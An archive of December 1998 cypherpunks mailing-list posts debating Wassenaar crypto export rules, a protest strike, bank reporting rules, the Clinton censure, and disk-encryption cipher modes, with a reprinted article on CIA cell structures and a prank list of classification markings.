"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Arnold G. Reinhold" <reinhold@world.std.com>
Date: Tue, 15 Dec 1998 06:15:03 +0800
To: "Frank O'Dwyer" <fod@brd.ie>
Subject: Re: Text of Wassenaar regulations, with comments
In-Reply-To: <v03130300b296975290f2@[24.128.119.92]>
Message-ID: <v03130306b29b2d978ed4@[24.128.119.92]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:59 PM +0000 12/14/98, Frank O'Dwyer wrote:
>"Arnold G. Reinhold" wrote:
>> I am not a lawyer and different administrations could issue more
>> restrictive rules (as the US does), but the new Wassenaar regulations
>> themselves do not seem to affect free distribution of programs like PGP and
>> Linux as long as they qualify as "public domain" as Wassenaar defines it.
>
>Unfortunately, AFAIK copyrighted software is NOT public domain. GPL and
>the like usually make a big song and dance to the effect of "this s/w is
>copyrighted and not in the public domain". Even worse, I think the
>original PGP is pretty clearly not in the public domain, since
>commercial uses must be paid for. So does anyone know just how does
>Wassenaar define the term "public domain", and is open source indeed
>covered?
>

This is the definition of PD from Wassenaar's "DEFINITIONS OF TERMS USED IN
THESE LISTS"  http://www.fitug.de/news/wa/Def.html:

>GTN "In the public domain"
>
>                           GSN This means "technology" or "software" which
>has been made available without restrictions upon its further
>dissemination.
>
>                                               N.B. Copyright restrictions
>do not remove "technology" or "software" from
>                                               being "in the public domain".

I think that is pretty clear, but it might be wise for people who are
distributing open source crypto to include language in their legal notices
stating that the material is to be considered in the public domain for the
purposes of the Wassenaar arangement and waving any rights that would cause
the export of the material to be prohibited under that arangement.  Check
with a good lawyer first, of course.


Arnold Reinhold





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dutra de Lacerda <dulac@ip.pt>
Date: Tue, 15 Dec 1998 01:41:22 +0800
To: cypherpunks@toad.com
Subject: Re: Mathematician-to-silicon compilers and the Law
Message-ID: <4.1.19981214164250.00962370@mail2.ip.pt>
MIME-Version: 1.0
Content-Type: text/plain



At Sunday, you wrote:
>what  happens to the law when regular english is just a few clicks away from 
>being an executable?  A chip?

How about the best cipher of all?!? The one we carry between our ears?
(Just proving the illegitimacy of such law attempts)

>Politicians have particular problems linking abstractions to atoms.  

Will they understand the question:
	Can we decipher a Human memory by analysis of a brain?!?


And if they consider crypto as a weapon what about cars and radios...
...and phones... and pens... etc.

	I'm thinking of the Jeep in military action...
	Cars are used by terrorists. They depend on them.
	Same with phones... pens... radios etc.
	... (Not to talk again about human memory)

All these items have the SAME importance as crypto... with an increasing
treat cars can be when changed in REAL weapons.

	Are these anti-crypto folks just stupid... or insane?:
	Why don't they do laws limited to the terrorists?!? 
	In my country guns are prohibited... but criminals have them.
	The arguments used by them just smell funny.

	So:
	Anti-Crypto can only have a point as a tool to political control. 
	It also is the negation of all human rights including the one of
	intellectual property. Brave new World?!?


>I see two extrapolated futures.  In one, the end result is restrictions on 
>free speech in certain areas (e.g., crypto), for the benefit of national 
>insecurity and the Children.  In the other, the Law will have to allow you 
>whatever posessions you like, and only punish *actions* after the fact. 
>Given recent historical trends...

	Only brought to public prepairing the anti-crypto campaign!
	What are the real links?!? Facts please!

	Fact: No government today governs... they now only manage economies.
	The result: The degradation of social and cultural links.
	... and what have been the actions taken to such irresponsibility?!?
	Not actions of correction but of repression... Wrong path!!!

D.L. 

 - - - 
Antonio Manuel Melo de Carvalho Dutra de Lacerda
Morada		: Rua Rodrigues Cabrilho, 5 - 5 Esq.
		  1400 Lisboa, PORTUGAL
Telefone	: +351-(1)-3013579
FAX & BBS	: +351-(1)-3021098




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <secret_squirrel@nym.alias.net>
Date: Tue, 15 Dec 1998 02:02:45 +0800
To: cypherpunks@cyberpass.net
Subject: IRS COMPUTER SYSTEMS TO BE BROUGHT UP TO DATE
Message-ID: <ebc85b4eda4737a09302dafa8622031a@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



A consortium of companies led by Computer Sciences has been awarded a major
contract for a 15-year project intended to modernize the computer systems of
the Internal Revenue Service.  

USA Today 10 Dec 98




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <measl@mfn.org>
Date: Tue, 15 Dec 1998 08:30:22 +0800
To: James Glave <james@wired.com>
Subject: Re: Anyone Striking?
In-Reply-To: <199812141529.HAA27041@hardly.hotwired.com>
Message-ID: <Pine.BSF.3.96.981214174836.351D-100000@greeves.mfn.org>
MIME-Version: 1.0
Content-Type: text/plain



We just returned from this.  Feel free to ask whatever you'd like.

Yours, 
J.A. Terranson
sysadmin@mfn.org

--
If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and 
elected; the intentional abuse and occassionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demogoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others.  Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------


On Mon, 14 Dec 1998, James Glave wrote:

:Date: Mon, 14 Dec 1998 07:29:32 -0800
:From: James Glave <james@wired.com>
:To: Robert Hettinga <rah@shipwright.com>
:Cc: cypherpunks@toad.com, cryptography@c2.net, dcsb@ai.mit.edu
:Subject: Anyone Striking?
:
:Anyone participating in the strike today? I'd like to possibly visit this
:with a news story...
:
:jtg
:
:At 03:10 PM 12/10/98 -0500, Robert Hettinga wrote:
:>At 9:05 AM -0500 on 12/10/98, Ken Williams wrote:
:>
:>> "Strike to protest Wassenaar!"
:>>
:>> URL:  http://www.zanshin.com/~bobg/
:>>
:>> "This is a global call for computer professionals to strike on
:>> Monday, 14 December, 1998 to protest the signing of the Wassenaar
:>> Arrangement, an international treaty that imposes new restrictions
:>> on cryptographic software technology.
:>
:>Now, *this* is interesting...
:>
:>Anyone actually contemplating doing this?
:
:
:James Glave, News Editor, Wired News, http://www.wired.com  +1 (415) 276-8430
:




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Tue, 15 Dec 1998 02:53:23 +0800
To: "Arnold G. Reinhold" <reinhold@world.std.com>
Subject: Re: Text of Wassenaar regulations, with comments
In-Reply-To: <v03130300b296975290f2@[24.128.119.92]>
Message-ID: <3675520A.B9A4350@brd.ie>
MIME-Version: 1.0
Content-Type: text/plain



"Arnold G. Reinhold" wrote:
> I am not a lawyer and different administrations could issue more
> restrictive rules (as the US does), but the new Wassenaar regulations
> themselves do not seem to affect free distribution of programs like PGP and
> Linux as long as they qualify as "public domain" as Wassenaar defines it.

Unfortunately, AFAIK copyrighted software is NOT public domain. GPL and
the like usually make a big song and dance to the effect of "this s/w is
copyrighted and not in the public domain". Even worse, I think the
original PGP is pretty clearly not in the public domain, since
commercial uses must be paid for. So does anyone know just how does
Wassenaar define the term "public domain", and is open source indeed
covered? 

Cheers,
Frank.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mib <mib@io.com>
Date: Tue, 15 Dec 1998 09:41:54 +0800
To: "Joel O'Connor" <ogrenivek@yahoo.com>
Subject: Re: I must admit. . .
In-Reply-To: <19981214202550.24462.rocketmail@send101.yahoomail.com>
Message-ID: <19981214191405.A1534@io.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, Dec 14, 1998 at 12:25:50PM -0800, you wrote:
> I wonder sometimes whether or not there is hope for us to ever stop
> this tyrrany.  I've seen a bunch of us diss the strike saying it was
> an outlandish and foolish idea, but I hadn't seen anyone of you come
> up with something better.

Cypherpunks write code?

- d.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 15 Dec 1998 10:06:06 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: I must admit. . . (fwd)
Message-ID: <199812150144.TAA05750@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 14 Dec 1998 19:14:05 -0600
> From: mib <mib@io.com>
> Subject: Re: I must admit. . .

> On Mon, Dec 14, 1998 at 12:25:50PM -0800, you wrote:
> > I wonder sometimes whether or not there is hope for us to ever stop
> > this tyrrany.  I've seen a bunch of us diss the strike saying it was
> > an outlandish and foolish idea, but I hadn't seen anyone of you come
> > up with something better.
> 
> Cypherpunks write code?

It's too bad they don't publish some of it in a newspaper or two...


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 15 Dec 1998 03:29:41 +0800
To: cypherpunks@Algebra.COM
Subject: Re: COMMENT: Minimum Security Devices and Procedures and Bank Secrecy
Message-ID: <199812141849.TAA01522@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>If this act is passed, I know what my response will be.  I will promptly
>withdraw all my monies from any institution that follows these regulations,
>refuse to do any sort of business with them, and urge all my friends and
>family to do the same.  I know that many others will do the same without
>hesitation.

Today I called the manager of the branch where I have account (for many years)
and asked him about "Know your customer" thingy and reporting that they
currently do. He seemed knowledgable to a certain extent about this matter,
and assured me that today they report only the $10K+ cash transactions. Then
I told him that I will take my business elsewhere should they decide to
offer "know your customer" service to the government and asked him nicely
to relay my stand to his manager.

Call them. These people make living from your money.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 15 Dec 1998 09:23:23 +0800
To: "William J.Hartwell" <billh@ibag.com>
Subject: Re: Anyone Striking?
In-Reply-To: <3.0.5.32.19981214114703.007e68f0@mail.xroads.com>
Message-ID: <Pine.BSF.3.91.981214195056.2046C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





On Mon, 14 Dec 1998, William J.Hartwell wrote:

> Not striking.....
> 
> but I am not working very hard today :-)
> 

I didn't get into the office until after noon. That oughta be worth 
something ... 

yawn 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 15 Dec 1998 09:38:14 +0800
To: "Joel O'Connor" <ogrenivek@yahoo.com>
Subject: Re: I must admit. . .
In-Reply-To: <19981214202550.24462.rocketmail@send101.yahoomail.com>
Message-ID: <Pine.BSF.3.91.981214195500.2046D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





On Mon, 14 Dec 1998, Joel O'Connor wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> I wonder sometimes whether or not there is hope for us to ever stop
> this tyrrany.  I've seen a bunch of us diss the strike saying it was
> an outlandish and foolish idea, but I hadn't seen anyone of you come
> up with something better.  That act of protest, no matter how small,
> serves to raise awareness.

Nothing like an extremely weak protest effort to hurt the cause ...

Having three geeks unplug their computers for a day sends the message 
that "nobody cares."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sun Toucher <aa@swipnet.se>
Date: Tue, 15 Dec 1998 03:59:03 +0800
To: cypherpunks@toad.com
Subject: Striking!
Message-ID: <3675634F.331A@swipnet.se>
MIME-Version: 1.0
Content-Type: text/plain



well   



 you could say I striked. 




"Twilight is upon me and soon night must fall"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 15 Dec 1998 10:31:59 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: The grandest jury nullification?
Message-ID: <199812150215.UAA05879@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Has it occurred to anyone that if Congress really does end up voting for a
censure instead of a full impeachment we will have the largest jury
nullification in history, if it's based upon the consensus of the people per
the various samples.


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Briggs <ian@deepwell.com>
Date: Tue, 15 Dec 1998 13:34:54 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: The grandest jury nullification? - Irrelevant
In-Reply-To: <199812150215.UAA05879@einstein.ssz.com>
Message-ID: <4.1.19981214211219.01c982c0@deepwell.com>
MIME-Version: 1.0
Content-Type: text/plain



>Has it occurred to anyone that if Congress really does end up voting for a
>censure instead of a full impeachment we will have the largest jury
>nullification in history, if it's based upon the consensus of the people per
>the various samples.

Has it occured to anyone that if Congress votes for censure, we will have
the fastest rulling by the Supreme Court that censure is unconstitutional
in the history of the U.S.?


Ian


Welcome to 1984
as with all goverment projects, its a bit late 
and slightly overbudget
	-Ian Briggs.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 15 Dec 1998 11:19:15 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: E-Snoop Law Review
Message-ID: <199812150246.VAA20931@smtp3.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



South Africa published in November a discussion paper,
"Review of Security Legislation" on electronic surveillance law
in several countries -- South Africa, US, UK, France, Germany, 
the Netherlands, Belgium, Canada and Hong Kong, with detailed
review of legislation of the last two -- as a basis for new 
legislation to protect against latest intrusive technology, or, 
rather, to restrict its usage to government agencies:

   http://jya.com/za-esnoop.htm  (364K)

Its comparative review of surveillance law is informative
for the way it lays out the similarity of each country's definition of 
the threat of technology -- somewhat to citizen privacy but more
importantly to law enforcement. It notes variations in privacy 
protection law, and finds, for example, US and UK deficiencies 
in that area even as these countries excell in manufacturing
the evil tools.

Still, South Africa is joining the crowd in tightening controls on
technology by proposing that telecomm providers make their
systems accessible to government (at their own expense), 
emulating the recent US-EU snooping agreement advanced 
by the FBI and Europol.

Thanks to APB for pointing.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 15 Dec 1998 15:09:13 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: The grandest jury nullification? - Irrelevant
In-Reply-To: <199812150215.UAA05879@einstein.ssz.com>
Message-ID: <v0313030ab29bb38e9993@[209.66.101.206]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:13 PM -0800 12/14/98, Ian Briggs wrote:
>>Has it occurred to anyone that if Congress really does end up voting for a
>>censure instead of a full impeachment we will have the largest jury
>>nullification in history, if it's based upon the consensus of the people per
>>the various samples.
>
>Has it occured to anyone that if Congress votes for censure, we will have
>the fastest rulling by the Supreme Court that censure is unconstitutional
>in the history of the U.S.?
>

I confess to watching and listening to entirely too much coverage of this
event, on CNN, Court TV, CNBC, MSNBC, Fox, and the networks. Maybe more
coverage than I watched in 1995 for the O.J. trial.

The legislative branch, Congress, is free to pass any sort of resolution
condemning Bill Clinton that they wish to. In fact, the Congress once quite
constitutionally voted a bill of censure of President Andrew Jackson.

(These bills of censure are really just expressions of negative opinion.
They carry no consequences other than being "the sense of Congress.')

What they cannot do is to pass a "bill of attainder," a law punishing a
specific person, whether a President or you and me. By punishment I mean a
fine, or imprisonment.

Outside of this, they are free to do as they wish.

Not that I support such a bullshit minor punishment. Clinton is _asking_
for Congress to censure him, so what's the point?

--Tim May

Y2K -- LMGALMAO -- Loading my guns and laughing my ass off
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 15 Dec 1998 15:30:23 +0800
To: cypherpunks@cyberpass.net
Subject: Re: I must admit. . .
Message-ID: <v0313030bb29bb9950554@[209.66.101.206]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:25 PM -0800 12/14/98, Joel O'Connor wrote:

>I wonder sometimes whether or not there is hope for us to ever stop
>this tyrrany.  I've seen a bunch of us diss the strike saying it was
>an outlandish and foolish idea, but I hadn't seen anyone of you come
>up with something better.

Public protests...what have they ever accomplished?

(If you cite the so-called Civil Rights Movement, you get minus 10 points.)


--Tim May

Y2K -- LMGALMAO -- Loading my guns and laughing my ass off
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 15 Dec 1998 08:41:40 +0800
To: cypherpunks@Algebra.COM
Subject: ....
Message-ID: <199812150016.BAA31878@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> For fast file-system crypto, you really want to implement the ciphers
> so that you encrypt several blocks at a time.  
...
> I'd like to know how this method compares to using an interleaved cbc
> mode - for example 8-way interleaved cbc.  The n-way interlaved
> cbc-mode works by chaining each n'th block together instead of each
> block. [...] Am I missing something?

In either case, you need to be sure that changed data is always encrypted with
different parameters -- that is, a changed file should be encrypted with a new
IV or different offset into S1 and S2. Otherwise, the attacks used to recover
badly wiped information could be used to look back in time, so to speak, and
figure out which portions of the file were changed. It's more of a problem if
you're using ofb o ecb o ofb (i.e., the CFS mode) than an interleaved CBC mode.

The 8-way interleaved CBC mode should have different IVs for each "lane" (that
is, a monster 512-bit IV) -- otherwise, files data types with repetitions in
the headers could be identified. The IV should be secret to completely rule out
leakage. However, there are some important restrictions on how you can use the
key in making an IV -- I suggest something like this to ensure nothing is
messed up: hash the passphrase into K0, use nDES-OFB with K0 to make a K1 and
K2, then nDES-OFB with K1 for making the IVs which nDES-interleaved-CBC uses
with K2 for the actual encryption.

> 
> astor
> 
> -- 
>  Alexander Kjeldaas, Guardian Networks AS, Trondheim, Norway
>  http://www.guardian.no/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@anon.olymp.org>
Date: Tue, 15 Dec 1998 19:52:55 +0800
To: cypherpunks@cyberpass.net
Subject: spy cell organization
Message-ID: <7ea12ca5e8c550cb3fb28bcb021cdcd8@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



    This article is reprinted from Full Disclosure. Copyright (c) 1986 
Capitol Information Association.  All rights reserved. Permission is hereby 
granted to reprint this article providing this message is included in its 
entirety.  Full Disclosure, Box 8275-CI3, Ann Arbor, Michigan 48107. $15/yr.

    The Central Intelligence Agency like many revoluntionary organizations 
(including the Russian KGB) organize their agent networks on a "cell" system, 
with small groups who meet and carry out specific activities.  The small groups 
have very few connections with the rest of the organization.  Typically, the 
connections between cells will involve only one person in each cell.  See 
sample organizational chart prepared by the Central Intelligence Agency for use 
in Nicaragua by the "Freedom Commandos" (reprinted from Psychological 
Operations in Guerrilla Warfare, the CIA's Nicaragua manual).

    When this structure is used and a member of a cell is discovered and forced 
to talk, he can only inform on members of his own cell.  If he was the person 
with a connection to another cell it is possible that other cell will also be 
compromised, but only after the connection is traced.  However, the tracing 
procedure is very slow, giving the organization time to regroup.

    Although the tracing of the cell structure is very slow, intelligence 
information can be passed to the main organization quickly.

    The main problem with such a cell structure is that the messages which pass 
through many cells can get grabled and since the cells have great autonomy they 
sometimes work at cross purposes.

      The CIA extends the cell system to include Police Departments, Labor 
Unions, Student Associations, Medical Associations, Reporters/Editors etc.  
These cells are created by recruiting (or placing) an agent within the 
organization.  The placement of the agent would depend on the main purpose of 
infiltrating the organization: information or control.  Usually, most of the 
people in the "organization" cells don't know that they are working for the 
Central Intelligence Agency.

    In addition, the CIA controls numerous "private" corporations.  Usually, 
only a few of the top officers are aware of the CIA connection.  The 
corporations conduct normal business operations, and are also available to 
provide services for the CIA whenever necessary.

    A top-secret memorandum from Brigadier General Edward Lansdale to General 
Maxwell Taylor published in The Pentagon Papers, described "unconventional 
warfare resources in Southeast Asia" as follows:

                CAT [Civil Air Transport] is a commerical 
            air line engaged in scheduled and nonscheduled 
            air operations throughout the Far East, with 
            headquarters and large maintenance facilities 
            in Taiwan.  CAT, a CIA proprietary 
            [corporation], provides air logistical support 
            under commerical air cover to most CIA and 
            other U.S. Government Agencies' requirements.  
            CAT supports covert and clandestine air 
            operations by providing trained and experienced 
            personnel, procurement of supplies and 
            equipment through covert commerical channels, 
            and the maintenance of a fairly large inventory 
            of transport and other type aircraft under both 
            Chinat [Chinese Nationalist] and U.S. registry.
            
                CAT has demonstrated its capabilities on 
            numerous occasions to meet all types of 
            contingency or long-term covert air 
            requirements in support of U.S. objectives.  
            During the last ten years, it has had some 
            notable achievements, including support of the 
            Chinese Nationalist withdrawal from the 
            mainland, air drop support to the French at 
            Dien Bien Phu, complete logistical and tactical 
            air support for the Indonesian operation, air 
            lifts of refugees from North Vietnam, more than 
            200 overflights of Mainland China and Tibet, 
            and extensive air support in Laos during the 
            current crisis...
            
    When the goal is to control the organization, the agent would be in a 
powerful place, like a Sergeant in a Police Department.  This would enable the 
CIA to make use of the Police Department resources, computer data banks, 
officers, etc.

    The police officers might perform surveillance on a target for the 
Sergeant, not knowing that they were really working for the CIA.  According to 
Philip Agee/1, "Thousands of policemen all over the world, for instance, are 
shadowing people for the CIA without knowing it.  They think they're working 
for their own police departments, when, in fact, their chief may be a CIA agent 
who's sending them out on CIA jobs and turning their information over to his 
CIA control".

    Agents in Labor Unions can encourage strikes to cause economic difficulties 
when the CIA wants to stir up political problems in foreign countries.  
Reporters and editors can be used to plant propaganda in the press or have 
information withheld when its in the CIA's best interest not to have it 
printed/2.

    When the goal is information collection the target organization would more 
likely be other intelligence services, medical or technology associations.  The 
agent would be placed so that he would have access to as much information as 
possible.  This could be a communications or mail clerk, etc.

    The CIA also targets banks for infiltration.  They are good organizations 
to provide cover for CIA personnel in foreign countries.  The bank can provide 
necessary accounts in bogus names.  They can also provide faked account 
balances so that background checks would out come out positive.  Banks are also 
used for funding mechanisms.  The Bank of Boston was used for such purposes by 
the CIA in Brazil/1.

    When the cells aren't aware that they're working for the CIA, or think 
they're working for someone else, they can be put to other devious uses.  For 
example, if the CIA controlled a cell which thought it worked for the PLO, they 
could send it on a terrorist mission with the intent that they be caught.  This 
would have a two fold advantage for the CIA, first, the PLO would be blamed 
(providing a good opportunity for the U.S. government to expouse propaganda 
against the PLO), and secondly, it would allow the CIA to commit a terrorist 
attack with extremely little risk of exposure -- to achieve a greater level of
interference in the affairs of foreign governments.

    The CIA can also use cells within an organization which aren't aware of 
their connection to the CIA for less devious purposes.  For examples, they can 
make public statement which have the effect of alienating their supporters.  
When one section makes offensive public statements, major disruptions can occur 
within the organization.

#!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
@k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
&S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Tue, 15 Dec 1998 21:09:27 +0800
To: cypherpunks@toad.com
Subject: Re: Global Strike to protest Wassenaar
Message-ID: <259a896938e4522ccd3d711a4d41f7c9@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Richard.Bragg@ssa.co.uk wrote:

>The idea would be to exchange nothing while make it appear to be exchanging
>information of real importance.  OK so this will be just like any managment
>memo but you must get my drift.

There used to be a web site called "Throwing Sand into the All-Seeing Eye" 
which listed a long list of possible NSA-snooper keywords, such as military 
classifications and code words that could be sent for fun across the 
Internet for sole purpose of being flagged by the NSA.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 15 Dec 1998 22:04:57 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: The grandest jury nullification? - Irrelevant (fwd)
Message-ID: <199812151343.HAA07259@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 14 Dec 1998 21:13:22 +0000
> From: Ian Briggs <ian@deepwell.com>
> Subject: Re: The grandest jury nullification? - Irrelevant

> >Has it occurred to anyone that if Congress really does end up voting for a
> >censure instead of a full impeachment we will have the largest jury
> >nullification in history, if it's based upon the consensus of the people per
> >the various samples.
> 
> Has it occured to anyone that if Congress votes for censure, we will have
> the fastest rulling by the Supreme Court that censure is unconstitutional
> in the history of the U.S.?

How's it going to get there? The ex_president certainly won't appeal (and
face removal from office) and since Congress passed it they likely won't
appeal.

Besides the Constitution says that Congress must stop at removal from office
and barring from future offices. It is clearly within their power to simply
slap his hand or write him a bad report card.


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mib <mib@io.com>
Date: Tue, 15 Dec 1998 22:59:16 +0800
To: James Morris <jmorris@intercode.com.au>
Subject: Re: Steganography ?
In-Reply-To: <259a896938e4522ccd3d711a4d41f7c9@anonymous>
Message-ID: <19981215080946.B15984@io.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, Dec 16, 1998 at 12:39:32AM +1100, James Morris wrote:
> On Tue, 15 Dec 1998, Mixmaster wrote:
> > There used to be a web site called "Throwing Sand into the All-Seeing Eye" 
> > which listed a long list of possible NSA-snooper keywords, such as military
> > classifications and code words that could be sent for fun across the
> > Internet for sole purpose of being flagged by the NSA.
> 
> I imagine they(tm) would have countermeasures for this kind of thing,
> given that once they catch a keyword, they know it's source, and have some
> idea of the kinds of patterns which are likely to be real communications. 
> 
> The Web site probably went straight into a junk filter, which would make
> it an ideal place to post your secrets from then on :-)

Unless that's exactly what they want us to think!

- d.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mib <mib@io.com>
Date: Tue, 15 Dec 1998 23:24:39 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: Throwing Sand into the All-Seeing Eye
In-Reply-To: <259a896938e4522ccd3d711a4d41f7c9@anonymous>
Message-ID: <19981215082520.A17023@io.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, Dec 15, 1998 at 04:02:00AM -0800, Mixmaster wrote:
> There used to be a web site called "Throwing Sand into the All-Seeing Eye" 
> which listed a long list of possible NSA-snooper keywords, such as military 
> classifications and code words that could be sent for fun across the 
> Internet for sole purpose of being flagged by the NSA.

The All Seeing Eye

What I propose, as a potential prank, is to include the following phrases 
in signature files on messages for a while. I'm sure the DoD will be annoyed.
It's a bit long, so ignore if you want to.

Chance
------------------------------------------------------------------------------
Throwing sand in the All-Seeing Eye

by Paul McGinnis (original article posted April 24, 1994)
(this is an article about my plan to have fun with paranoid people in the 
US government)

I've often wondered if various entities of the US government monitor the 
public messages in newsgroups such as this or monitor unencrypted 
electronic mail. I've worked in the communications industry since 1987 
and I know how easy it is to monitor digital communications
-- in fact, it is often necessary to monitor data communications to find 
problems in the hardware or software.

There have been rumors that NSA can scan international links for keywords 
like "MX missile" or "Stealth bomber". It's very easy to set up this kind 
of filter program -- for instance, if you mention
Kibo in a Usenet public message, he will respond. With that in mind, I'd  
like to propose an experiment (maybe prank is a better description...). 
The following is a list of phrases that are put at the beginning of 
classified files by the US government. They are taken from Department of
Defense manual DOD 5220.22-M and Title 32, Section 2001 Code of Federal 
Regulations.

Note: comments are placed between square brackets, i.e. [this is a comment].

My experiment is to see what happens if you start putting some of these 
at the beginning of your Internet messages... 

primary markings

TOP SECRET
(TS)
[markings shown in parentheses are accepted abbreviations. For example, 
you could just put (TS)
on a document, instead of TOP SECRET]

SECRET
(S)

CONFIDENTIAL
(C) 

additional markings

SENSITIVE COMPARTMENTED INFORMATION
[very secret intelligence information]
SCI

DISSEMINATION AND EXTRACTION OF INFORMATION CONTROLLED BY
ORIGINATOR
[this marking, also written as ORCON, is used on information that clearly 
identifies a US intelligence source or method]
ORCON

WARNING NOTICE - INTELLIGENCE SOURCES OR METHODS INVOLVED
[this marking is used on information that could identify an intelligence 
source or method]
WNINTEL

SINGLE INTEGRATED OPERATIONAL PLAN - EXTREMELY SENSITIVE
INFORMATION
[US nuclear war fighting plans]
SIOP-ESI

CRITICAL NUCLEAR WEAPON DESIGN INFORMATION
CNWDI

RESTRICTED DATA - This material contains RESTRICTED DATA as defined in
